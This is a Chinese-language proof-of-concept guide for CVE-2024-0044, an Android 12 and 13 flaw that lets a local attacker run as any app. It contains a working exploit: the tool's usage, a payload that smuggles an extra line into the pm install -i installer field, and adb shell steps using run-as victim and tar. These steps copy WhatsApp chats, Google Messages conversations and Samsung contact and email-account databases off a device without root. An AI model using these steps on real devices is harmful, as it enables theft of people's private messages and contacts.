
CVE-2024-0044: a "run-as any app" high-severity vulnerability affecting Android versions 12 and 13
CVE-2024-0044,在 PackageInstallerService.java 文件的 createSessionInternal 函数中被发现,是一个影响 Android 12 和 13 的高严重性漏洞。该漏洞允许攻击者执行“以任意应用身份运行”攻击,导致本地权限提升,无需用户交互。问题源于 createSessionInternal 函数内的输入验证不当。攻击者可通过操纵会话创建过程利用此漏洞,可能获得对敏感数据的未授权访问,并在受影响设备上执行未授权操作
该漏洞由 Meta security 发现
概念验证由 Tiny hack 总结并分享
安全补丁详情请参阅 Android 安全公告
python3 cve_2024_0044.py -h
##########################################################################################
###############S%%#####################################################%%S################
###############%++*S##################################################?++?################
################%++*S###############################################S*++?#################
#################%+++%#############################################S*++%##################
##################S*++%###########################################%+++%###################
###################S*++?#########SSS%%?????***?????%%%SS#########%++*S####################
#####################?++*##S%%?**+++++++++++++++++++++++**??%S##?++*S#####################
######################?++**+++++++++++++++++++++++++++++++++++**++*#######################
###################S%?*++++++++++++++++++++++++++++++++++++++++++++?%S####################
#################%?+++++++++++++++++++++++++++++++++++++++++++++++++++*%S#################
##############S?+++++++++++++++++++++++++++++++++++++++++++++++++++++++++?S###############
############S?+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*S#############
##########S?+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*S###########
#########%+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++?##########
#######S*+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*S########
######%++++++++++++++*%SS%?+++++++++++++++++++++++++++++++++++?%SS%*++++++++++++++%#######
#####%++++++++++++++*######%+++++++++++++++++++++++++++++++++%######?++++++++++++++?######
####?+++++++++++++++*######S+++++++++++++++++++++++++++++++++%######?+++++++++++++++?#####
###%+++++++++++++++++*%SS%?+++++++++++++++++++++++++++++++++++?%SS%*+++++++++++++++++?####
##S+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++%###
##*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++S##
#%+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++?##
#*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++S#
S+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++%#
usage: cve_2024_0044.py [-h] -P P -A A
CVE-2024-0044: run-as any app @Pl4int3xt
options:
-h, --help show this help message and exit
-P P package name (default: None)
-A A apk file path (default: None)
-P 用于指定您想要以之身份运行的目标应用包名
-A 用于指定要推送到设备中的 APK 文件路径
运行该工具
python3 cve_2024_0044.py -P com.whatsapp -A /home/pl4int3xt/Downloads/F-Droid.apk
将生成类似下面的 payload.txt 文件
PAYLOAD="@null
victim 10289 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"
pm install -i "$PAYLOAD" /data/local/tmp/F-Droid.apk
Success 消息pl4int3xt ~> adb shell
pixel:/ $ PAYLOAD="@null
> victim 10289 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"
pixel:/ $ pm install -i "$PAYLOAD" /data/local/tmp/F-Droid.apk
Success
pixel:/ $ mkdir /data/local/tmp/wa/
pixel:/ $ touch /data/local/tmp/wa/wa.tar
pixel:/ $ chmod -R 0777 /data/local/tmp/wa/
pixel:/ $ run-as victim
pixel:/data/user/0 $ tar -cf /data/local/tmp/wa/wa.tar com.whatsapp
创建临时目录:mkdir /data/local/tmp/wa/
创建 tar 文件的占位符:touch /data/local/tmp/wa/wa.tar
设置开放权限:chmod -R 0777 /data/local/tmp/wa/,确保任何用户均可对该目录进行读取、写入和执行操作。
切换用户上下文:run-as victim,以获得与“victim”用户相同的权限。
归档目标应用的数据:tar -cf /data/local/tmp/wa/wa.tar com.whatsapp,创建 WhatsApp 数据目录的 tarball。
adb pull /data/local/tmp/wa/wa.tar
您可以使用 7z 或其他工具解压数据
您可以使用 Whatsapp chat exporter 将其转换为 HTML
这样即可在没有设备 root 权限的情况下获取 WhatsApp 数据
只需按如下方式更改包名
plaintext@archlinux ~/D/c/p/cve_2024_0044 (feature)> python3 ./cve_2024_0044.py -P com.google.android.apps.messaging -A ~/Down
loads/F-Droid.apk
按照上述说明操作,提取 wa.tar 文件后解压,并使用 sqlitebrowser 或其他工具打开 com.google.android.apps.messaging/databases/bugle_db 中的对话。
已在三星设备上测试。对于其他设备,请检查联系人提供者的包名。
plaintext@archlinux ~/D/c/p/cve_2024_0044 (feature)> python3 ./cve_2024_0044.py -P com.samsung.android.app.contacts -A ~/Downloads/F-Droid.apk
按照上述说明操作,提取 wa.tar 文件后解压,并使用 sqlitebrowser 或其他工具打开 com.samsung.android.providers.contacts/databases/contacts2.db 中的联系人。该 db 文件包含所有用户电子邮件账户信息及联系人列表。